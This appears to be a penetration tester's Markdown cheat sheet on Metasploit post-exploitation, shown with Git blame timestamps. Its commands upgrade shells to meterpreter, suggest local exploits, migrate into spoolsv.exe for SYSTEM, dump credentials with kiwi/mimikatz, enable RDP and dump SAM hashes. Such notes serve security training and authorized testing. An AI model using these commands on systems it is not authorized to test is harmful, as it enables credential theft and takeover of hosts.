killchain-compendium/post_exploitation/docs/metasploit.md

51 lines
1.1 KiB
Markdown
Raw Normal View History

2021-08-23 01:13:54 +02:00
# Metasploit
* `-j` Run job in background
* `sessions -i 1` interactive session 1
## Meterpreter
* [CheatSheet](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/)
* Upgrade shell
```sh
post/multi/manage/shell_to_meterpreter
```
* `execute` command
* `search` files
* `download` and `upload` files
# Metasploit after gaining foothold
* Meterpreter shell is opened on target. Run exploit suggester
```sh
run post/multi/recon/local_exploit_suggester
```
* Decide on your exploit and `background` the meterpreter.
* Use the exploit.
```sh
use <path/to/exploit>
```
* Fill options like `session` and run the exploit
2021-09-08 02:09:14 +02:00
### Privilege Escalation on Windows Using Metasploit
2021-08-23 01:13:54 +02:00
* Find process with higher privs and migrate to it. Example `spoolsv.exe`.
```sh
migrate -N spoolsv.exe
```
2021-09-08 02:09:14 +02:00
* After `NT AUTHORITY\SYSTEM` is gained start mimikatz. and dump all creds
2021-08-23 01:13:54 +02:00
```sh
load kiwi
help
creds_all
```
* Enable RDP via `run post/windows/manage/enable_rdp`
2021-09-08 02:09:14 +02:00
### Hashdump on Windows
* Meterpreter
```sh
run post/windows/gather/hashdump
```
```sh
load kiwi
lsa_dump_sam
```